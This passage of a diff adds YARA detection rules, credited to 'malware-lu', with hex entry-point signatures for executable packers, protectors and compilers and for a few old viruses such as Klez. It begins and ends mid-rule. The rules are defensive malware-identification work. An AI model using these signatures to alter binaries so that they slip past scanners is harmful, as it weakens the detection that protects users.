+		$a0 = { FC BE D4 00 40 00 BF 00 ?? ?? 00 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 94 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b5
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 49 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy10NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 9C 3B 40 00 E8 8C FC FF FF 6A 00 68 E4 39 40 00 6A 0A 6A 00 E8 40 FD FF FF E8 EF F5 FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b7
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB 14 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 ?? 00 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB B7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBysPacker028BetaShoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5E 83 EE 0A 8B 06 03 C2 8B 08 89 4E F3 83 EE 0F 56 52 8B F0 AD AD 03 C2 8B D8 6A 04 BF 00 10 00 00 57 57 6A 00 FF 53 08 5A 59 BD 00 80 00 00 55 6A 00 50 51 52 50 89 06 AD AD 03 C2 50 AD 03 C2 FF D0 6A 04 57 AD 50 6A 00 FF 53 }
+
+condition:
+		$a0
+}
+	
+	
+rule nPack113002006BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 9C 00 00 00 E8 2D 02 00 00 E8 DD 06 00 00 E8 2C 06 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BorlandC1999Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 A1 ?? ?? ?? ?? A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv100bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SEAAXEv22
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC BC ?? ?? 0E 1F A3 ?? ?? E8 ?? ?? A1 ?? ?? 8B ?? ?? ?? 2B C3 8E C0 B1 03 D3 E3 8B CB BF ?? ?? 8B F7 F3 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PureBasic4xDLLNeilHodgson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 75 0E 8B 44 24 04 A3 ?? ?? ?? 10 E8 22 00 00 00 83 7C 24 08 02 75 00 83 7C 24 08 00 75 05 E8 ?? 00 00 00 83 7C 24 08 03 75 00 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? 0F 00 00 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEPackerv70byTurboPowerSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C3 83 ?? ?? 2E ?? ?? ?? ?? B9 ?? ?? 8C C8 8E D8 8B F1 4E 8B FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSYP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 47 8B C2 05 1E 00 52 8B D0 B8 02 3D CD 21 8B D8 5A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DSHIELD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 E8 ?? ?? 5E 83 EE ?? 16 17 9C 58 B9 ?? ?? 25 ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchy023alphaRyd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 8D 9D A0 08 00 00 E8 ?? 00 00 00 8B 45 10 EB 42 8D 9D A0 04 00 00 E8 ?? 00 00 00 49 49 78 40 8D 5D 20 74 03 83 C3 40 31 D2 42 E8 ?? 00 00 00 8D 0C 48 F6 C2 10 74 F3 41 91 8D 9D A0 08 00 00 E8 ?? 00 00 00 3D 00 08 00 00 83 D9 FF 83 F8 60 83 D9 FF 89 45 10 56 89 FE 29 C6 F3 A4 5E EB 90 BE ?? ?? ?? 00 BB ?? ?? ?? 00 55 46 AD 85 C0 74 ?? 97 56 FF 13 85 C0 74 16 95 AC 84 C0 75 FB 38 06 74 E8 78 ?? 56 55 FF 53 04 AB 85 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy12NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 A4 32 40 00 E8 E8 F1 FF FF 6A 00 68 54 2A 40 00 6A 0A 6A 00 E8 A8 F2 FF FF E8 C7 EA FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote12DemoSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F7 FE FF FF 05 CB 22 00 00 FF E0 E8 EB FE FF FF 05 BB 19 00 00 FF E0 E8 BD 00 00 00 08 B2 62 00 01 52 17 0C 0F 2C 2B 20 7F 52 79 01 30 07 17 29 4F 01 3C 30 2B 5A 3D C7 26 11 26 06 59 0E 78 2E 10 14 0B 13 1A 1A 3F 64 1D 71 33 57 21 09 24 8B 1B 09 37 08 61 0F 1D 1D 2A 01 87 35 4C 07 39 0B }
+
+condition:
+		$a0
+}
+	
+	
+rule EXE32Packv137
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED 4C 8E 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv136
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED CC 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AINEXEv230
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 07 B9 ?? ?? BE ?? ?? 33 FF FC F3 A4 A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded20XJitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorv151x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 C1 ?? ?? ?? FE C3 31 C0 64 FF 30 64 89 20 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1304ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }
+	$a1 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule CopyProtectorv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E A2 ?? ?? 53 51 52 1E 06 B4 ?? 1E 0E 1F BA ?? ?? CD 21 1F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv139
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED EC 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv138
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED DC 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandC1999
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2547V2600Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB BC 18 00 00 2B C3 50 68 ?? ?? ?? ?? 68 60 1B 00 00 68 60 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv131Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorBasicProEdition110RandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 50 83 EC 08 64 A1 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 83 C4 08 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 64 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite12c1998IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PcSharev40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 90 34 40 00 68 B6 28 40 00 64 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector0X12Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule STNPEE113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 97 3B 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftDefenderV11xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CDCopsII
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack11BasicEditionap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv13x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B ?? 74 02 81 83 55 3B ?? 74 02 81 ?? 53 3B ?? 74 01 ?? ?? ?? ?? ?? 02 81 ?? ?? E8 ?? ?? ?? ?? 3B 74 01 ?? 5D 8B D5 81 ED }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxInvoluntary1349
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? B9 ?? ?? 8C DD ?? 8C C8 ?? 8E D8 8E C0 33 F6 8B FE FC ?? ?? AD ?? 33 C2 AB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinZip32bit6x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 15 FC 81 40 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV36LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02LCCWin321xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECrypt10ReBirth
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 60 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 4E 28 40 00 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy11NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 0C 3C 40 00 E8 24 FC FF FF 6A 00 68 28 3A 40 00 6A 0A 6A 00 E8 D8 FC FF FF E8 7F F5 FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEcryptbyarchphase
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 E0 53 56 33 C0 89 45 E4 89 45 E0 89 45 EC ?? ?? ?? ?? 64 82 40 00 E8 7C C7 FF FF 33 C0 55 68 BE 84 40 00 64 FF 30 64 89 20 68 CC 84 40 00 ?? ?? ?? ?? 00 A1 10 A7 40 00 50 E8 1D C8 FF FF 8B D8 85 DB 75 39 E8 3A C8 FF FF 6A 00 6A 00 68 A0 A9 40 00 68 00 04 00 00 50 6A 00 68 00 13 00 00 E8 FF C7 FF FF 6A 00 68 E0 84 40 00 A1 A0 A9 40 00 50 6A 00 E8 ?? ?? ?? ?? E9 7D 01 00 00 53 A1 10 A7 40 00 50 E8 42 C8 FF FF 8B F0 85 F6 75 18 6A 00 68 E0 84 40 00 68 E4 84 40 00 6A 00 E8 71 C8 FF FF E9 53 01 00 00 53 6A 00 E8 2C C8 FF FF A3 ?? ?? ?? ?? 83 3D 48 A8 40 00 00 75 18 6A 00 68 E0 84 40 00 68 F8 84 40 00 6A 00 E8 43 C8 FF FF E9 25 01 00 00 56 E8 F8 C7 FF FF A3 4C A8 40 00 A1 48 A8 40 00 E8 91 A1 FF FF 8B D8 8B 15 48 A8 40 00 85 D2 7C 16 42 33 C0 8B 0D 4C A8 40 00 03 C8 8A 09 8D 34 18 88 0E 40 4A 75 ED 8B 15 48 A8 40 00 85 D2 7C 32 42 33 C0 8D 34 18 8A 0E 80 F9 01 75 05 C6 06 FF EB 1C 8D 0C 18 8A 09 84 ?? ?? ?? ?? ?? 00 EB 0E 8B 0D 4C A8 40 00 03 C8 0F B6 09 49 88 0E 40 4A 75 D1 8D ?? ?? ?? ?? E8 A5 A3 FF FF 8B 45 E8 8D 55 EC E8 56 D5 FF FF 8D 45 EC BA 18 85 40 00 E8 79 BA FF FF 8B 45 EC E8 39 BB FF FF 8B D0 B8 54 A8 40 00 E8 31 A6 FF FF BA 01 00 00 00 B8 54 A8 40 00 E8 12 A9 FF FF E8 DD A1 FF FF 68 50 A8 40 00 8B D3 8B 0D 48 A8 40 00 B8 54 A8 40 00 E8 56 A7 FF FF E8 C1 A1 FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv30xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LameCryptLaZaRus
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPack29NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100LZBRSBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB }
+	$a1 = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VIRUSIWormKLEZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 D2 40 ?? 68 04 AC 40 ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 BC D0 }
+
+condition:
+		$a0
+}
+	
+	
+rule YZPack12UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02LocklessIntroPackAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITE3211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv20bartxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeSVKP111emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMASM32TASM32MicrosoftVisualBasic
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239DLLminimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
